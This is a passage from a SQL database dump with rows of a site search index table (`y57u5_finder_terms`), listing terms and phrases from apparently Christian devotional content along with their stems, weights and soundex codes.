(23265, 'devil the', 'devil the', 0, 1, 1.3, 'D143', 2, '*'),
(23269, 'died', 'di', 0, 0, 0.2667, 'D000', 5, '*'),
(23275, 'do these', 'do these', 0, 1, 1.2667, 'D200', 2, '*'),
(23277, 'do you', 'do you', 0, 1, 1.2, 'D000', 7, '*'),
(23288, 'due', 'due', 0, 0, 0.2, 'D000', 4, '*'),
(23291, 'earth', 'earth', 0, 0, 0.3333, 'E630', 12, '*'),
(23292, 'earth and', 'earth and', 0, 1, 1.3, 'E6353', 2, '*'),
(23294, 'enough', 'enough', 0, 0, 0.4, 'E520', 6, '*'),
(23297, 'etc', 'etc', 0, 0, 0.2, 'E320', 8, '*'),
(23302, 'everyone', 'everyon', 0, 0, 0.5333, 'E165', 9, '*'),
(23303, 'everyone needs', 'everyon needs', 0, 1, 1.4667, 'E16532', 2, '*'),
(23304, 'everyone needs to', 'everyon needs to', 0, 1, 1.5667, 'E165323', 2, '*'),
(23306, 'faithful', 'faith', 0, 0, 0.5333, 'F314', 3, '*'),
(23312, 'female', 'femal', 0, 0, 0.4, 'F540', 2, '*'),
(23318, 'following', 'follow', 0, 0, 0.6, 'F452', 10, '*'),
(23321, 'for a', 'for a', 0, 1, 1.1667, 'F600', 10, '*'),
(23324, 'for me', 'for me', 0, 1, 1.2, 'F650', 3, '*'),
(23332, 'for your', 'for your', 0, 1, 1.2667, 'F600', 21, '*'),
(23337, 'form of', 'form of', 0, 1, 1.2333, 'F651', 2, '*'),
(23339, 'forsake', 'forsak', 0, 0, 0.4667, 'F620', 2, '*'),
(23347, 'from sin', 'from sin', 0, 1, 1.2667, 'F6525', 2, '*'),
(23350, 'from the', 'from the', 0, 1, 1.2667, 'F653', 18, '*'),
(23351, 'from the dead', 'from the dead', 0, 1, 1.4333, 'F653', 2, '*'),
(23352, 'from the presence', 'from the presence', 0, 1, 1.5667, 'F65316252', 2, '*'),
(23354, 'gave', 'gave', 0, 0, 0.2667, 'G100', 6, '*'),
(23359, 'give', 'give', 0, 0, 0.2667, 'G100', 19, '*'),
(23362, 'glory', 'glori', 0, 0, 0.3333, 'G460', 13, '*'),
(23363, 'glory of', 'glori of', 0, 1, 1.2667, 'G461', 4, '*'),
(23369, 'god and', 'god and', 0, 1, 1.2333, 'G353', 17, '*'),
(23373, 'god and the', 'god and the', 0, 1, 1.3667, 'G353', 4, '*'),
(23374, 'god hath', 'god hath', 0, 1, 1.2667, 'G300', 2, '*'),
(23380, 'god\'s', 'god', 0, 0, 0.3333, 'G320', 47, '*'),
(23381, 'god\'s glory', 'god glory', 0, 1, 1.3667, 'G3246', 3, '*'),
(23386, 'goes', 'goe', 0, 0, 0.2667, 'G000', 2, '*'),
(23391, 'good', 'good', 0, 0, 0.2667, 'G300', 14, '*'),
(23396, 'good news', 'good news', 0, 1, 1.3, 'G352', 2, '*'),
(23400, 'good works', 'good works', 0, 1, 1.3333, 'G362', 2, '*'),
(23402, 'gospel', 'gospel', 0, 0, 0.4, 'G140', 7, '*'),
(23407, 'habits', 'habit', 0, 0, 0.4, 'H132', 3, '*'),
(23413, 'hath', 'hath', 0, 0, 0.2667, 'H300', 3, '*'),
(23416, 'have a', 'have a', 0, 1, 1.2, 'H100', 14, '*'),
(23418, 'have a lot', 'have a lot', 0, 1, 1.3333, 'H143', 2, '*'),
(23419, 'have come', 'have come', 0, 1, 1.3, 'H125', 3, '*'),
(23430, 'he goes', 'he goes', 0, 1, 1.2333, 'H200', 2, '*'),
(23432, 'he is', 'he is', 0, 1, 1.1667, 'H200', 14, '*'),
(23433, 'he is a', 'he is a', 0, 1, 1.2333, 'H200', 3, '*'),
(23436, 'he\'s', 'he', 0, 0, 0.2667, 'H200', 5, '*'),
(23439, 'heart and', 'heart and', 0, 1, 1.3, 'H6353', 3, '*'),
(23445, 'heart that', 'heart that', 0, 1, 1.3333, 'H630', 2, '*'),
(23447, 'higher', 'higher', 0, 0, 0.4, 'H260', 3, '*'),
(23455, 'himself', 'himself', 0, 0, 0.4667, 'H5241', 9, '*'),
(23456, 'himself a', 'himself a', 0, 1, 1.3, 'H5241', 2, '*'),
(23466, 'holding', 'hold', 0, 0, 0.4667, 'H4352', 3, '*'),
(23469, 'how can', 'how can', 0, 1, 1.2333, 'H250', 2, '*'),
(23471, 'human', 'human', 0, 0, 0.3333, 'H500', 10, '*'),
(23472, 'human being', 'human being', 0, 1, 1.3667, 'H5152', 6, '*'),
(23473, 'human being you', 'human being you', 0, 1, 1.5, 'H5152', 1, '*'),
(23476, 'i am', 'i am', 0, 1, 1.1333, 'I500', 9, '*'),
(23478, 'i come', 'i come', 0, 1, 1.2, 'I250', 2, '*'),
(23479, 'i come to', 'i come to', 0, 1, 1.3, 'I253', 2, '*'),
(23484, 'i know', 'i know', 0, 1, 1.2, 'I250', 3, '*'),
(23490, 'i\'m', 'i', 0, 0, 0.2, 'I500', 5, '*'),
(23499, 'if you do', 'if you do', 0, 1, 1.3, 'I130', 2, '*'),
(23500, 'ii', 'ii', 0, 0, 0.1333, 'I000', 4, '*'),
(23506, 'in all', 'in all', 0, 1, 1.2, 'I540', 5, '*'),
(23508, 'in christ', 'in christ', 0, 1, 1.3, 'I52623', 4, '*'),
(23512, 'in jesus', 'in jesus', 0, 1, 1.2667, 'I520', 7, '*'),
(23513, 'in my', 'in my', 0, 1, 1.1667, 'I500', 3, '*'),
(23515, 'in the name', 'in the name', 0, 1, 1.3667, 'I535', 3, '*'),
(23525, 'into the', 'into the', 0, 1, 1.2667, 'I530', 14, '*'),
(23526, 'into the world', 'into the world', 0, 1, 1.4667, 'I53643', 3, '*'),
(23527, 'into your', 'into your', 0, 1, 1.3, 'I536', 8, '*'),
(23529, 'introduction', 'introduct', 0, 0, 0.8, 'I5363235', 8, '*'),
(23532, 'involved', 'involv', 0, 0, 0.5333, 'I51413', 4, '*'),
(23545, 'is one', 'is one', 0, 1, 1.2, 'I250', 5, '*'),
(23547, 'is one of', 'is one of', 0, 1, 1.3, 'I251', 4, '*'),
(23552, 'isaiah', 'isaiah', 0, 0, 0.4, 'I200', 9, '*'),
(23555, 'issues', 'issu', 0, 0, 0.4, 'I200', 5, '*'),
(23558, 'it comes', 'it comes', 0, 1, 1.2667, 'I3252', 2, '*'),
(23559, 'it comes to', 'it comes to', 0, 1, 1.3667, 'I32523', 2, '*'),
(23566, 'jesus', 'jesu', 0, 0, 0.3333, 'J000', 46, '*'),
(23567, 'jesus and', 'jesu and', 0, 1, 1.3, 'J530', 3, '*'),
(23570, 'jesus as', 'jesu as', 0, 1, 1.2667, 'J000', 3, '*'),
(23574, 'jesus came', 'jesu came', 0, 1, 1.3333, 'J500', 3, '*'),
(23584, 'jesus in', 'jesu in', 0, 1, 1.2667, 'J500', 2, '*'),
(23588, 'jesus to', 'jesu to', 0, 1, 1.2667, 'J300', 5, '*'),
(23594, 'john 9', 'john 9', 0, 1, 1.2, 'J500', 2, '*'),
(23605, 'knowing', 'know', 0, 0, 0.4667, 'K520', 3, '*'),
(23608, 'knowledge and', 'knowledg and', 0, 1, 1.4333, 'K543253', 2, '*'),
(23610, 'leaf', 'leaf', 0, 0, 0.2667, 'L100', 2, '*'),
(23616, 'let me', 'let me', 0, 1, 1.2, 'L350', 4, '*'),
(23618, 'let\'s', 'let', 0, 0, 0.3333, 'L320', 3, '*'),
(23621, 'life and', 'life and', 0, 1, 1.2667, 'L153', 20, '*'),
(23625, 'life you', 'life you', 0, 1, 1.2667, 'L100', 6, '*'),
(23629, 'list', 'list', 0, 0, 0.2667, 'L230', 2, '*'),
(23636, 'lord and', 'lord and', 0, 1, 1.2667, 'L6353', 8, '*'),
(23637, 'lord and saviour', 'lord and saviour', 0, 1, 1.5333, 'L6353216', 2, '*'),
(23640, 'lord jesus', 'lord jesus', 0, 1, 1.3333, 'L632', 3, '*'),
(23642, 'lot', 'lot', 0, 0, 0.2, 'L300', 12, '*'),
(23643, 'lot of', 'lot of', 0, 1, 1.2, 'L310', 7, '*'),
(23645, 'lowest', 'lowest', 0, 0, 0.4, 'L230', 2, '*'),
(23652, 'major', 'major', 0, 0, 0.3333, 'M260', 5, '*'),
(23655, 'make a', 'make a', 0, 1, 1.2, 'M200', 4, '*'),
(23659, 'make sure', 'make sure', 0, 1, 1.3, 'M260', 2, '*'),
(23665, 'man', 'man', 0, 0, 0.2, 'M000', 32, '*'),
(23670, 'man can', 'man can', 0, 1, 1.2333, 'M250', 5, '*'),
(23678, 'may be', 'mai be', 0, 1, 1.2, 'M100', 6, '*'),
(23679, 'may be blotted', 'mai be blotted', 0, 1, 1.4667, 'M143', 2, '*'),
(23680, 'me', 'me', 0, 0, 0.1333, 'M000', 20, '*'),
(23685, 'me in', 'me in', 0, 1, 1.1667, 'M000', 2, '*'),
(23686, 'me in jesus', 'me in jesus', 0, 1, 1.3667, 'M200', 2, '*'),
(23689, 'me to', 'me to', 0, 1, 1.1667, 'M300', 8, '*'),
(23690, 'me to do', 'me to do', 0, 1, 1.2667, 'M300', 5, '*'),
(23698, 'men', 'men', 0, 0, 0.2, 'M000', 25, '*'),
(23699, 'men of', 'men of', 0, 1, 1.2, 'M100', 3, '*'),
(23703, 'might', 'might', 0, 0, 0.3333, 'M230', 7, '*'),
(23704, 'might be', 'might be', 0, 1, 1.2667, 'M231', 2, '*'),
(23706, 'money', 'monei', 0, 0, 0.3333, 'M000', 9, '*'),
(23709, 'mouth', 'mouth', 0, 0, 0.3333, 'M300', 13, '*'),
(23718, 'my', 'my', 0, 0, 0.1333, 'M000', 16, '*'),
(23734, 'name amen', 'name amen', 0, 1, 1.3, 'N000', 5, '*'),
(23735, 'name of', 'name of', 0, 1, 1.2333, 'N100', 8, '*'),
(23736, 'name of jesus', 'name of jesus', 0, 1, 1.4333, 'N120', 5, '*'),
(23738, 'need to answer', 'need to answer', 0, 1, 1.4667, 'N3526', 2, '*'),
(23739, 'need to make', 'need to make', 0, 1, 1.4, 'N352', 2, '*'),
(23740, 'needs to', 'need to', 0, 1, 1.2667, 'N323', 2, '*'),
(23742, 'new creature', 'new creature', 0, 1, 1.4, 'N2636', 2, '*'),
(23749, 'news', 'new', 0, 0, 0.2667, 'N200', 2, '*'),
(23764, 'not to', 'not to', 0, 1, 1.2, 'N300', 4, '*'),
(23770, 'of all', 'of all', 0, 1, 1.2, 'O140', 7, '*'),
(23775, 'of god and', 'of god and', 0, 1, 1.3333, 'O12353', 8, '*'),
(23777, 'of god\'s', 'of god', 0, 1, 1.2667, 'O1232', 9, '*'),
(23781, 'of jesus', 'of jesus', 0, 1, 1.2667, 'O120', 15, '*'),
(23784, 'of knowledge', 'of knowledge', 0, 1, 1.4, 'O125432', 3, '*'),
(23785, 'of knowledge and', 'of knowledge and', 0, 1, 1.5333, 'O12543253', 2, '*'),
(23787, 'of life you', 'of life you', 0, 1, 1.3667, 'O141', 2, '*'),
(23789, 'of many', 'of many', 0, 1, 1.2333, 'O150', 2, '*'),
(23791, 'of one', 'of one', 0, 1, 1.2, 'O150', 3, '*'),
(23793, 'of refreshing', 'of refreshing', 0, 1, 1.4333, 'O1616252', 2, '*'),
(23794, 'of refreshing shall', 'of refreshing shall', 0, 1, 1.6333, 'O16162524', 2, '*'),
(23796, 'of the gospel', 'of the gospel', 0, 1, 1.4333, 'O13214', 4, '*'),
(23799, 'of what', 'of what', 0, 1, 1.2333, 'O130', 6, '*'),
(23803, 'of your personal', 'of your personal', 0, 1, 1.5333, 'O1616254', 1, '*'),
(23804, 'old', 'old', 0, 0, 0.2, 'O430', 7, '*'),
(23811, 'on his', 'on his', 0, 1, 1.2, 'O520', 3, '*'),
(23813, 'on the cross', 'on the cross', 0, 1, 1.4, 'O53262', 3, '*'),
(23814, 'on their', 'on their', 0, 1, 1.2667, 'O536', 2, '*'),
(23816, 'on this', 'on this', 0, 1, 1.2333, 'O532', 2, '*'),
(23818, 'on time', 'on time', 0, 1, 1.2333, 'O535', 2, '*'),
(23826, 'one or', 'on or', 0, 1, 1.2, 'O560', 2, '*'),
(23827, 'one or two', 'on or two', 0, 1, 1.3333, 'O563', 2, '*'),
(23832, 'or two', 'or two', 0, 1, 1.2, 'O630', 2, '*'),
(23836, 'our', 'our', 0, 0, 0.2, 'O600', 43, '*'),
(23841, 'out when', 'out when', 0, 1, 1.2667, 'O350', 2, '*'),
(23842, 'out when the', 'out when the', 0, 1, 1.4, 'O353', 2, '*'),
(23843, 'passed', 'pass', 0, 0, 0.4, 'P230', 2, '*'),
(23857, 'personal', 'person', 0, 0, 0.5333, 'P6254', 6, '*'),
(23860, 'personal relationship', 'person relationship', 0, 1, 1.7, 'P6254643521', 2, '*'),
(23861, 'personal relationship with', 'person relationship with', 0, 1, 1.8667, 'P62546435213', 2, '*'),
(23869, 'practices', 'practic', 0, 0, 0.6, 'P6232', 3, '*'),
(23879, 'pregnant', 'pregnant', 0, 0, 0.5333, 'P6253', 3, '*'),
(23882, 'presence of the', 'presenc of the', 0, 1, 1.5, 'P625213', 5, '*'),
(23892, 'question', 'question', 0, 0, 0.5333, 'Q350', 3, '*'),
(23897, 'questions', 'question', 0, 0, 0.6, 'Q352', 3, '*'),
(23898, 'questions that', 'question that', 0, 1, 1.4667, 'Q3523', 2, '*'),
(23904, 'raised', 'rais', 0, 0, 0.4, 'R230', 4, '*'),
(23910, 'reality', 'realiti', 0, 0, 0.4667, 'R430', 4, '*'),
(23913, 'realize', 'realiz', 0, 0, 0.4667, 'R420', 2, '*'),
(23914, 'realize that', 'realiz that', 0, 1, 1.4, 'R423', 2, '*'),
(23921, 'refreshing', 'refresh', 0, 0, 0.6667, 'R16252', 2, '*'),
(23922, 'refreshing shall', 'refresh shall', 0, 1, 1.5333, 'R162524', 2, '*'),
(23923, 'refreshing shall come', 'refresh shall come', 0, 1, 1.7, 'R16252425', 2, '*'),
(23924, 'relationship', 'relationship', 0, 0, 0.8, 'R43521', 5, '*'),
(23925, 'relationship with', 'relationship with', 0, 1, 1.5667, 'R435213', 5, '*'),
(23927, 'religious', 'religi', 0, 0, 0.6, 'R420', 3, '*'),
(23930, 'repentance', 'repent', 0, 0, 0.6667, 'R15352', 2, '*'),
(23939, 'righteousness', 'righteous', 0, 0, 0.8667, 'R23252', 6, '*'),
(23950, 'said', 'said', 0, 0, 0.2667, 'S300', 21, '*'),
(23953, 'said to', 'said to', 0, 1, 1.2333, 'S300', 5, '*'),
(23954, 'said to him', 'said to him', 0, 1, 1.3667, 'S350', 2, '*'),
(23960, 'save', 'save', 0, 0, 0.2667, 'S100', 2, '*'),
(23967, 'saved', 'save', 0, 0, 0.3333, 'S130', 3, '*'),
(23984, 'saviour', 'saviour', 0, 0, 0.4667, 'S160', 3, '*'),
(23993, 'saviour of', 'saviour of', 0, 1, 1.3333, 'S161', 2, '*'),
(24001, 'says “but', 'sai “but', 0, 1, 1.3, 'S130', 2, '*'),
(24003, 'self', 'self', 0, 0, 0.2667, 'S410', 2, '*'),
(24006, 'several', 'sever', 0, 0, 0.4667, 'S164', 5, '*'),
(24009, 'shall', 'shall', 0, 0, 0.3333, 'S400', 22, '*'),
(24010, 'shall come', 'shall come', 0, 1, 1.3333, 'S425', 2, '*'),
(24011, 'shall come from', 'shall come from', 0, 1, 1.5, 'S425165', 2, '*'),
(24012, 'shalt', 'shalt', 0, 0, 0.3333, 'S430', 2, '*'),
(24019, 'she', 'she', 0, 0, 0.2, 'S000', 9, '*'),
(24028, 'short', 'short', 0, 0, 0.3333, 'S630', 2, '*'),
(24031, 'shows', 'show', 0, 0, 0.3333, 'S000', 7, '*'),
(24034, 'sin', 'sin', 0, 0, 0.2, 'S500', 5, '*'),
(24035, 'sin and', 'sin and', 0, 1, 1.2333, 'S530', 2, '*'),
(24062, 'sinners', 'sinner', 0, 0, 0.4667, 'S562', 2, '*'),
(24065, 'sins', 'sin', 0, 0, 0.2667, 'S520', 6, '*'),
(24068, 'sins may', 'sin may', 0, 1, 1.2667, 'S525', 2, '*'),
(24069, 'sins may be', 'sin may be', 0, 1, 1.3667, 'S5251', 2, '*'),
(24076, 'son', 'son', 0, 0, 0.2, 'S500', 11, '*'),
(24077, 'son of', 'son of', 0, 1, 1.2, 'S510', 2, '*'),
(24083, 'state', 'state', 0, 0, 0.3333, 'S300', 8, '*'),
(24086, 'student', 'student', 0, 0, 0.4667, 'S353', 2, '*'),
(24089, 'sure', 'sure', 0, 0, 0.2667, 'S600', 10, '*'),
(24094, 'take you through', 'take you through', 0, 1, 1.5333, 'T2362', 3, '*'),
(24098, 'testified', 'testifi', 0, 0, 0.6, 'T2313', 2, '*'),
(24101, 'tests', 'test', 0, 0, 0.3333, 'T232', 2, '*'),
(24107, 'that christ', 'that christ', 0, 1, 1.3667, 'T2623', 2, '*'),
(24113, 'that jesus', 'that jesus', 0, 1, 1.3333, 'T200', 4, '*'),
(24115, 'that no', 'that no', 0, 1, 1.2333, 'T500', 3, '*'),
(24119, 'that you are', 'that you are', 0, 1, 1.4, 'T600', 7, '*'),
(24120, 'that your', 'that your', 0, 1, 1.3, 'T600', 4, '*'),
(24121, 'that your sins', 'that your sins', 0, 1, 1.4667, 'T6252', 2, '*'),
(24124, 'the bible said', 'the bible said', 0, 1, 1.4667, 'T1423', 2, '*'),
(24125, 'the cross', 'the cross', 0, 1, 1.3, 'T262', 3, '*'),
(24127, 'the dead', 'the dead', 0, 1, 1.2667, 'T000', 6, '*'),
(24130, 'the glory', 'the glory', 0, 1, 1.3, 'T246', 5, '*'),
(24131, 'the glory of', 'the glory of', 0, 1, 1.4, 'T2461', 4, '*'),
(24132, 'the gospel', 'the gospel', 0, 1, 1.3333, 'T214', 7, '*'),
(24135, 'the heart', 'the heart', 0, 1, 1.3, 'T630', 3, '*'),
(24139, 'the lowest', 'the lowest', 0, 1, 1.3333, 'T423', 2, '*'),
(24141, 'the man', 'the man', 0, 1, 1.2333, 'T500', 5, '*'),
(24143, 'the mouth', 'the mouth', 0, 1, 1.3, 'T530', 3, '*'),
(24145, 'the name', 'the name', 0, 1, 1.2667, 'T500', 8, '*'),
(24146, 'the name of', 'the name of', 0, 1, 1.3667, 'T510', 8, '*'),
(24163, 'the son', 'the son', 0, 1, 1.2333, 'T250', 2, '*'),
(24164, 'the son of', 'the son of', 0, 1, 1.3333, 'T251', 2, '*'),
(24165, 'the times', 'the times', 0, 1, 1.3, 'T520', 2, '*'),
(24166, 'the times of', 'the times of', 0, 1, 1.4, 'T521', 2, '*'),
(24167, 'the whole', 'the whole', 0, 1, 1.3, 'T400', 2, '*'),
(24169, 'the world and', 'the world and', 0, 1, 1.4333, 'T64353', 3, '*'),
(24171, 'the world to', 'the world to', 0, 1, 1.4, 'T643', 2, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(24177, 'therefore and', 'therefor and', 0, 1, 1.4333, 'T61653', 2, '*'),
(24178, 'therefore and be', 'therefor and be', 0, 1, 1.5333, 'T616531', 2, '*'),
(24179, 'these', 'these', 0, 0, 0.3333, 'T200', 24, '*'),
(24182, 'these things', 'these things', 0, 1, 1.4, 'T2352', 2, '*'),
(24186, 'thine', 'thine', 0, 0, 0.3333, 'T500', 3, '*'),
(24187, 'thine heart', 'thine heart', 0, 1, 1.3667, 'T563', 2, '*'),
(24189, 'thing', 'thing', 0, 0, 0.3333, 'T520', 15, '*'),
(24192, 'things are', 'thing are', 0, 1, 1.3333, 'T526', 5, '*'),
(24195, 'things of', 'thing of', 0, 1, 1.3, 'T521', 4, '*'),
(24206, 'thou', 'thou', 0, 0, 0.2667, 'T000', 6, '*'),
(24207, 'thou shalt', 'thou shalt', 0, 1, 1.3333, 'T243', 2, '*'),
(24212, 'through the', 'through the', 0, 1, 1.3667, 'T623', 6, '*'),
(24214, 'thy', 'thy', 0, 0, 0.2, 'T000', 6, '*'),
(24215, 'thy mouth', 'thy mouth', 0, 1, 1.3, 'T530', 2, '*'),
(24217, 'tim', 'tim', 0, 0, 0.2, 'T500', 3, '*'),
(24218, 'tim 1', 'tim 1', 0, 1, 1.1667, 'T500', 2, '*'),
(24226, 'times of', 'time of', 0, 1, 1.2667, 'T521', 2, '*'),
(24227, 'times of refreshing', 'time of refreshing', 0, 1, 1.6333, 'T521616252', 2, '*'),
(24228, 'titles', 'titl', 0, 0, 0.4, 'T420', 2, '*'),
(24233, 'to answer', 'to answer', 0, 1, 1.3, 'T526', 2, '*'),
(24245, 'to following', 'to following', 0, 1, 1.4, 'T1452', 2, '*'),
(24253, 'to jesus to', 'to jesus to', 0, 1, 1.3667, 'T230', 3, '*'),
(24255, 'to save', 'to save', 0, 1, 1.2333, 'T210', 2, '*'),
(24267, 'turn', 'turn', 0, 0, 0.2667, 'T650', 7, '*'),
(24272, 'turn to', 'turn to', 0, 1, 1.2333, 'T653', 2, '*'),
(24275, 'two', 'two', 0, 0, 0.2, 'T000', 15, '*'),
(24278, 'unclean', 'unclean', 0, 0, 0.4667, 'U5245', 2, '*'),
(24281, 'unto', 'unto', 0, 0, 0.2667, 'U530', 12, '*'),
(24290, 'we are all', 'we are all', 0, 1, 1.3333, 'W640', 3, '*'),
(24291, 'were', 'were', 0, 0, 0.2667, 'W600', 13, '*'),
(24298, 'what the', 'what the', 0, 1, 1.2667, 'W300', 5, '*'),
(24299, 'what the bible', 'what the bible', 0, 1, 1.4667, 'W314', 2, '*'),
(24300, 'when it', 'when it', 0, 1, 1.2333, 'W530', 8, '*'),
(24302, 'when the', 'when the', 0, 1, 1.2667, 'W530', 15, '*'),
(24303, 'when the times', 'when the times', 0, 1, 1.4667, 'W5352', 2, '*'),
(24304, 'whether', 'whether', 0, 0, 0.4667, 'W360', 12, '*'),
(24307, 'white', 'white', 0, 0, 0.3333, 'W300', 2, '*'),
(24310, 'who', 'who', 0, 0, 0.2, 'W000', 32, '*'),
(24313, 'who is', 'who is', 0, 1, 1.2, 'W200', 7, '*'),
(24317, 'whole', 'whole', 0, 0, 0.3333, 'W400', 2, '*'),
(24322, 'whom', 'whom', 0, 0, 0.2667, 'W500', 5, '*'),
(24325, 'will and', 'will and', 0, 1, 1.2667, 'W453', 2, '*'),
(24327, 'will you', 'will you', 0, 1, 1.2667, 'W400', 4, '*'),
(24332, 'with him', 'with him', 0, 1, 1.2667, 'W350', 7, '*'),
(24333, 'with him you', 'with him you', 0, 1, 1.4, 'W350', 1, '*'),
(24334, 'with my', 'with my', 0, 1, 1.2333, 'W350', 2, '*'),
(24343, 'with your', 'with your', 0, 1, 1.3, 'W360', 12, '*'),
(24345, 'woman', 'woman', 0, 0, 0.3333, 'W500', 5, '*'),
(24348, 'word in', 'word in', 0, 1, 1.2333, 'W635', 2, '*'),
(24350, 'work on', 'work on', 0, 1, 1.2333, 'W625', 4, '*'),
(24352, 'works', 'work', 0, 0, 0.3333, 'W620', 11, '*'),
(24355, 'world and', 'world and', 0, 1, 1.3, 'W64353', 4, '*'),
(24359, 'world but', 'world but', 0, 1, 1.3, 'W64313', 2, '*'),
(24361, 'world to', 'world to', 0, 1, 1.2667, 'W643', 2, '*'),
(24366, 'ye', 'ye', 0, 0, 0.1333, 'Y000', 6, '*'),
(24367, 'ye therefore', 'ye therefore', 0, 1, 1.4, 'Y3616', 2, '*'),
(24368, 'ye therefore and', 'ye therefore and', 0, 1, 1.5333, 'Y361653', 2, '*'),
(24369, 'you are a', 'you are a', 0, 1, 1.3, 'Y600', 6, '*'),
(24373, 'you be', 'you be', 0, 1, 1.2, 'Y100', 4, '*'),
(24375, 'you because', 'you because', 0, 1, 1.3667, 'Y120', 4, '*'),
(24381, 'you do', 'you do', 0, 1, 1.2, 'Y300', 13, '*'),
(24382, 'you do these', 'you do these', 0, 1, 1.4, 'Y320', 2, '*'),
(24387, 'you give', 'you give', 0, 1, 1.2667, 'Y210', 2, '*'),
(24389, 'you have a', 'you have a', 0, 1, 1.3333, 'Y100', 4, '*'),
(24393, 'you in the', 'you in the', 0, 1, 1.3333, 'Y530', 3, '*'),
(24396, 'you just', 'you just', 0, 1, 1.2667, 'Y230', 2, '*'),
(24398, 'you through', 'you through', 0, 1, 1.3667, 'Y362', 6, '*'),
(24400, 'you want', 'you want', 0, 1, 1.2667, 'Y530', 3, '*'),
(24401, 'you want to', 'you want to', 0, 1, 1.3667, 'Y530', 2, '*'),
(24404, 'you\'ll', 'you', 0, 0, 0.4, 'Y400', 5, '*'),
(24405, 'you\'ll be', 'you be', 0, 1, 1.3, 'Y410', 2, '*'),
(24409, 'young', 'young', 0, 0, 0.3333, 'Y520', 6, '*'),
(24410, 'young and', 'young and', 0, 1, 1.3, 'Y5253', 2, '*'),
(24420, 'your personal', 'your personal', 0, 1, 1.4333, 'Y616254', 3, '*'),
(24422, 'your sins', 'your sins', 0, 1, 1.3, 'Y6252', 2, '*'),
(24424, 'your sins may', 'your sins may', 0, 1, 1.4333, 'Y62525', 2, '*'),
(24425, '“but', '“but', 0, 0, 0.2667, '“130', 3, '*'),
(24428, '“for', '“for', 0, 0, 0.2667, '“160', 2, '*'),
(24440, '“that', '“that', 0, 0, 0.3333, '“300', 3, '*'),
(24443, '“therefore', '“therefor', 0, 0, 0.6667, '“3616', 2, '*'),
(24446, '“this', '“thi', 0, 0, 0.3333, '“320', 2, '*'),
(24891, 'a matter', 'a matter', 0, 1, 1.2667, 'A536', 4, '*'),
(24893, 'a year', 'a year', 0, 1, 1.2, 'A600', 3, '*'),
(24895, 'activities', 'activ', 0, 0, 0.6667, 'A23132', 8, '*'),
(24898, 'affect', 'affect', 0, 0, 0.4, 'A123', 3, '*'),
(24910, 'and calling', 'and calling', 0, 1, 1.3667, 'A532452', 3, '*'),
(24914, 'and people', 'and people', 0, 1, 1.3333, 'A5314', 3, '*'),
(24921, 'anointed', 'anoint', 0, 0, 0.5333, 'A530', 5, '*'),
(24924, 'anointing', 'anoint', 0, 0, 0.6, 'A5352', 9, '*'),
(24927, 'another person\'s', 'anoth person', 0, 1, 1.5333, 'A53616252', 5, '*'),
(24931, 'anything', 'anyth', 0, 0, 0.5333, 'A5352', 16, '*'),
(24932, 'anything that', 'anyth that', 0, 1, 1.4333, 'A53523', 7, '*'),
(24938, 'are not', 'ar not', 0, 1, 1.2333, 'A653', 17, '*'),
(24944, 'around you', 'around you', 0, 1, 1.3333, 'A653', 7, '*'),
(24946, 'atmosphere', 'atmospher', 0, 0, 0.6667, 'A35216', 5, '*'),
(24951, 'attend', 'attend', 0, 0, 0.4, 'A353', 5, '*'),
(24960, 'because they', 'becaus they', 0, 1, 1.4, 'B230', 7, '*'),
(24964, 'bible through', 'bibl through', 0, 1, 1.4333, 'B4362', 3, '*'),
(24966, 'body and', 'bodi and', 0, 1, 1.2667, 'B353', 3, '*'),
(24982, 'calling of', 'call of', 0, 1, 1.3333, 'C4521', 2, '*'),
(24986, 'can\'t get', 'can get', 0, 1, 1.3, 'C5323', 3, '*'),
(24988, 'cast', 'cast', 0, 0, 0.2667, 'C300', 7, '*'),
(24993, 'change his', 'chang his', 0, 1, 1.3333, 'C520', 3, '*'),
(24994, 'change his mind', 'chang his mind', 0, 1, 1.5, 'C5253', 3, '*'),
(24997, 'christians', 'christian', 0, 0, 0.6667, 'C62352', 12, '*'),
(24998, 'christians are', 'christian are', 0, 1, 1.4667, 'C623526', 5, '*'),
(25003, 'come through', 'come through', 0, 1, 1.4, 'C5362', 4, '*'),
(25011, 'concerning', 'concern', 0, 0, 0.6667, 'C52652', 7, '*'),
(25014, 'confession of', 'confess of', 0, 1, 1.4333, 'C51251', 4, '*'),
(25016, 'conscience', 'conscienc', 0, 0, 0.6667, 'C5252', 9, '*'),
(25019, 'constant', 'constant', 0, 0, 0.5333, 'C52353', 3, '*'),
(25024, 'create', 'creat', 0, 0, 0.4, 'C630', 4, '*'),
(25034, 'don\'t let', 'don let', 0, 1, 1.3, 'D5343', 9, '*'),
(25035, 'don\'t let your', 'don let your', 0, 1, 1.4667, 'D53436', 5, '*'),
(25036, 'don\'t use', 'don use', 0, 1, 1.3, 'D532', 3, '*'),
(25043, 'emotions', 'emot', 0, 0, 0.5333, 'E5352', 5, '*'),
(25048, 'enemies', 'enemi', 0, 0, 0.4667, 'E520', 3, '*'),
(25053, 'evil', 'evil', 0, 0, 0.2667, 'E140', 10, '*'),
(25056, 'false', 'fals', 0, 0, 0.3333, 'F420', 5, '*'),
(25062, 'fasting', 'fast', 0, 0, 0.4667, 'F2352', 8, '*'),
(25077, 'find', 'find', 0, 0, 0.2667, 'F530', 17, '*'),
(25093, 'fruit', 'fruit', 0, 0, 0.3333, 'F630', 6, '*'),
(25094, 'fruit of', 'fruit of', 0, 1, 1.2667, 'F631', 6, '*'),
(25095, 'fruit of the', 'fruit of the', 0, 1, 1.4, 'F6313', 4, '*'),
(25098, 'get to', 'get to', 0, 1, 1.2, 'G300', 6, '*'),
(25100, 'gift', 'gift', 0, 0, 0.2667, 'G130', 3, '*'),
(25112, 'god to change', 'god to change', 0, 1, 1.4333, 'G3252', 3, '*'),
(25115, 'god will', 'god will', 0, 1, 1.2667, 'G340', 12, '*'),
(25119, 'grow', 'grow', 0, 0, 0.2667, 'G600', 11, '*'),
(25120, 'grow in', 'grow in', 0, 1, 1.2333, 'G650', 6, '*'),
(25124, 'his mind', 'hi mind', 0, 1, 1.2667, 'H253', 3, '*'),
(25126, 'holy spirit', 'holi spirit', 0, 1, 1.3667, 'H42163', 16, '*'),
(25132, 'if you\'re', 'if you', 0, 1, 1.3, 'I160', 3, '*'),
(25140, 'in the presence', 'in the presence', 0, 1, 1.5, 'I5316252', 3, '*'),
(25143, 'in you', 'in you', 0, 1, 1.2, 'I500', 8, '*'),
(25145, 'increase', 'increas', 0, 0, 0.5333, 'I5262', 4, '*'),
